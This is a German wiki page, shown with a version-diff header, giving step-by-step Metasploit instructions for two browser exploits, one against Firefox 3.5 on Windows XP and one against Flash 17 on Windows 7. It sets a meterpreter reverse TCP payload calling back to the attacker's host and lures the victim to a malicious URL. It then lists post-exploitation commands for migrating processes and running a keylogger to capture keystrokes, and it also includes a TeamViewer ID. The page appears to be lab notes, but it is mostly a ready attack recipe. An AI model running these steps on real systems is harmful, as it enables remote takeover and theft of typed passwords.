Metasploit browser Exlpoit: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
Zeile 51: | Zeile 51: | ||
ip 192.168.244.50 | ip 192.168.244.50 | ||
− | === | + | ===on the console=== |
metasploit konsole starten | metasploit konsole starten | ||
*msfconsole | *msfconsole |
Version vom 2. September 2019, 09:56 Uhr
Setup Opfer
Winxp Service pack 3 Firefox 3.5
Setup Hacker
Kali Linux ip: 192.168.242.53
Action
starte metasploit
msfconsole
use exploit/multi/browser/firefox_escape_retval set payload windows/meterpreter/reverse_tcp set lhost 192.168.242.53 (lokaler Host) set svrhost 192.168.242.53 (HTTP-Server IP) set svrport 8888 (HTTP-Server Port) set lport 4444 (lokaler Port) set uripath /hack (optional) exploit
jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack wenn wir meterpreter > sehen hat der exploit funktioniert
session - i 1 (in die session gehen) sessions -h (zeigt optionen) ps (zeigt prozesse) migrate PSID (verschiebt in den prozess Z.b explorer.exe) getpid (zeigt momentanen prozess) keyscan_start (startet den keyloger) keyscan_dump (zeigt aufzeichnungen) keyscan_stop (stopt keyloger)
Win7 32bit Exploit
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html
- Setup Opfer
win732 bit
adobeflash 17.0.0.134
firefox
TeamViewer ID 597 708 786
Hackersystem
kali linux
ip 192.168.244.50
on the console
metasploit konsole starten
- msfconsole
auswahl des exploits
- use exploit/windows/browser/adobe_flash_domain_memory_uaf
auswahl der schadsoftware
- set payload windows/meterpreter/reverse_tcp
setzen des localhost
- set lhost 192.168.244.50
setzen des webservers
- set srvhost 192.168.244.50
pfad zum hack
- set uripath /hack
ausführen des exploits
- exploit
auf dem opfer
- gehen mit win7 auf http://192.168.244.150:8080/hack
auf dem hackersystem
commandos
sessions -l (listet die sessions) sessions -i 1 (in die session gehen) sessions -h (zeigt optionen) ps (zeigt prozesse) migrate PSID (verschiebt in den prozess Z.b explorer.exe) getpid (zeigt momentanen prozess) keyscan_start (startet den keyloger) keyscan_dump (zeigt aufzeichnungen) keyscan_stop (stopt keyloger)
vorgehnsweise
session betreten
- msf exploit(adobe_flash_domain_memory_uaf) > sessions -i 1
ps listing
- meterpreter > ps